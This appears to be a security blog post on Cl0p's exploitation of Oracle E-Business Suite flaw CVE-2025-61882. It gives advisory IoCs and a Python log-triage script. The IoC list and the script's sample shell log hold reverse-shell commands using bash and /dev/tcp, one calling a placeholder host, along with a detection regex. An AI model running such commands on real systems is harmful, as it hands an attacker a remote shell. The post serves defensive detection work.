Oracle’s 9.8 CVSS Nightmare: Cl0p Exploits CVE-2025-61882 in a Wave of Data Theft

Oracle Zero-Day Chaos

The infamous ransomware gang is back in the spotlight, this time targeting Oracle’s E-Business Suite, and yes, Oracle just dropped an emergency patch.

Late last week, Oracle confirmed what cybersecurity pros had feared. A critical zero-day vulnerability (CVE-2025-61882) was being actively exploited in the wild.

The flaw scores 9.8 on the CVSS scale, meaning it’s basically the cybersecurity equivalent of a Category-5 hurricane.

Attackers can execute code remotely without authentication: no username, no password, just a direct hit over HTTP. Once inside, they can completely take over the Concurrent Processing component of Oracle E-Business Suite.

Oracle’s own advisory said it best: “This vulnerability is remotely exploitable without authentication… and may result in remote code execution.”

Anyone with network access could hijack your Oracle server.

The affected versions are Oracle E-Business Suite 12.2.3 through 12.2.14.

The Exploit Leaked

Soon after the attacks came to light, a mysterious group calling themselves “Scattered Lapsus$ Hunters” leaked what they claimed was the actual exploit code on Telegram.

The leak included two Python scripts (exp.py and server.py) capable of opening reverse shells to the attacker’s server: the kind of code that keeps SOC teams awake at 3 AM.

Oracle’s indicators of compromise (IoCs) match what was leaked:

  • 200.107.207[.]26 (HTTP GET/POST activity)
  • 185.181.60[.]11 (HTTP GET/POST activity)
  • Reverse shell command: sh -c /bin/bash -i >& /dev/tcp/… 0>&1
  • Exploit archive: oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip

That’s not just a PoC floating around, it’s the real weapon Cl0p used in August’s massive data theft campaign.


The Cl0p Connection Between MOVEit and Oracle

Cl0p has been running a masterclass in zero-day exploitation over the last few years:

  • 2020: Accellion FTA – 100+ orgs breached.
  • 2021: SolarWinds Serv-U FTP – remote takeover.
  • 2023: GoAnywhere MFT – 100+ companies hit.
  • 2023: MOVEit Transfer – 2,773 organisations attacked worldwide.
  • 2024: Cleo file transfer 0days – double hit.
  • 2025: Oracle E-Business Suite – the newest trophy.

Mandiant CSO Charles Carmakal confirmed that Cl0p used several Oracle vulnerabilities, some of which were patched in July, while the new zero-day was patched this weekend.

He warned, “Given the broad mass zero-day exploitation that has already occurred… organisations should examine whether they were already compromised.”

Behind the Scenes

Scattered Lapsus$ Hunters, a loose coalition of threat actors claiming ties to Scattered Spider, Lapsus$, and ShinyHunters, say they originally built the exploit. Somebody then allegedly passed it on or sold it to Cl0p.

ShinyHunters said, “That was mine…” and later added, “It made me angry how it should be used by another group, so we leaked it. No hate to Cl0p.”

So here we are: cybercriminal drama, leaked exploit code, and billion-dollar businesses rushing to patch everything before Monday morning.


What You Should Do Right Now

  • Patch Immediately. Install the latest Oracle update and verify dependencies.
  • Check for Compromise. Scan your logs for the IoCs Oracle listed. Watch for the suspicious IPs and shell commands.
  • Isolate and Monitor. If you see suspicious activity, shut down affected servers and start a forensic investigation.
  • Communicate Internally. Align IT, security, and management on the response plan. Silence kills speed.
  • Don’t Wait for the Next CVE. Cl0p has shown they can stay on their toes. Were you assuming their window of opportunity is your patch window?
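The IoC list above and the “Check for Compromise” step both come down to the same sweep: confirm whether your release is in the affected range, then look for the listed addresses and the reverse-shell fingerprint in your logs. Here is one way to do that, as an added example that is not from the article, from Oracle, or from any of the groups named. It assumes Apache/OHS combined-format access logs and syslog-style shell audit lines; the sample lines are constructed, and the callback address in the reverse-shell line is taken from the RFC 5737 documentation range rather than the elided value in the advisory.

```python
"""Triage helpers for CVE-2025-61882 (added example): version-range check
plus an IoC sweep over web access logs and shell/audit logs."""
import re

# Indicators quoted from Oracle's advisory (defanged in the article, re-fanged here for matching).
IOC_IPS = {"200.107.207.26", "185.181.60.11"}
EXPLOIT_ARCHIVE = "oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip"
# Reverse-shell fingerprint: an interactive bash redirected to /dev/tcp.
REVERSE_SHELL_RE = re.compile(r"bash\s+-i\s+>&\s*/dev/tcp/|/dev/tcp/\S+\s+0>&1")

# Affected range published by Oracle: 12.2.3 through 12.2.14 (inclusive).
AFFECTED_MIN, AFFECTED_MAX = (12, 2, 3), (12, 2, 14)

# Apache/OHS combined log format: client IP, timestamp, quoted request, status.
ACCESS_LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample data (assumption: not from any real system).
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [06/Oct/2025:09:14:02 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 5123
200.107.207.26 - - [06/Oct/2025:09:15:41 +0000] "POST /OA_HTML/AppsLogin HTTP/1.1" 200 412
10.0.0.7 - - [06/Oct/2025:09:16:10 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 302 0
185.181.60.11 - - [06/Oct/2025:09:17:03 +0000] "GET /OA_HTML/ HTTP/1.1" 200 88
"""
SAMPLE_SHELL_LOG = """\
Oct 06 09:17:05 ebs-app1 sh[24531]: sh -c /bin/bash -i >& /dev/tcp/203.0.113.9/4444 0>&1
Oct 06 09:18:00 ebs-app1 cron[1201]: (applmgr) CMD (/u01/scripts/cleanup.sh)
Oct 06 09:19:30 ebs-app1 sh[24590]: unzip /tmp/oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip
"""


def parse_version(version: str) -> tuple:
    """'12.2.14' -> (12, 2, 14); tuples compare element by element."""
    return tuple(int(part) for part in version.split("."))


def is_affected_version(version: str) -> bool:
    """True when the EBS release falls inside the range Oracle listed as vulnerable."""
    return AFFECTED_MIN <= parse_version(version) <= AFFECTED_MAX


def scan_access_log(text: str) -> list:
    """One finding per request whose client address is a listed IoC."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = ACCESS_LINE_RE.match(line)
        if m and m.group("ip") in IOC_IPS:
            findings.append({
                "line": lineno, "ip": m.group("ip"),
                "method": m.group("method"), "path": m.group("path"),
                "indicator": "ioc_ip",
            })
    return findings


def scan_shell_log(text: str) -> list:
    """Findings for reverse-shell command lines and the leaked archive name."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if REVERSE_SHELL_RE.search(line):
            findings.append({"line": lineno, "indicator": "reverse_shell_pattern"})
        if EXPLOIT_ARCHIVE in line:
            findings.append({"line": lineno, "indicator": "exploit_archive"})
    return findings


if __name__ == "__main__":
    print("12.2.12 affected:", is_affected_version("12.2.12"))
    for finding in scan_access_log(SAMPLE_ACCESS_LOG) + scan_shell_log(SAMPLE_SHELL_LOG):
        print(finding)
```

Point `scan_access_log` at your real OHS access logs and `scan_shell_log` at auditd or shell history exports; a hit on the reverse-shell pattern is the one that should trigger the “Isolate and Monitor” step, because it means the attacker already had code execution, not just a probe.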

Conclusion

In the end, Oracle’s scramble to patch CVE-2025-61882 isn’t just another vendor update. It’s a reminder that even enterprise-grade systems can fall overnight when cybercriminals move faster than the patch cycle. The Cl0p gang has proven, once again, that zero-day exploitation isn’t slowing down. It’s scaling up.

If your organisation uses Oracle E-Business Suite or any critical enterprise software, don’t wait for headlines to remind you what’s at stake. Act now, patch, investigate, and strengthen your defences.

Need help assessing your environment or ensuring you’re protected from the next big exploit? Contact us for cybersecurity consulting and services. Our experts can help secure your business before attackers find their way in.

Janki Mehta

Janki Mehta is a passionate Cyber-Security Enthusiast who keenly monitors the latest developments in the Web/Cyber Security industry. She puts her knowledge into practice and helps web users by arming them with the necessary security measures to stay safe in the digital world.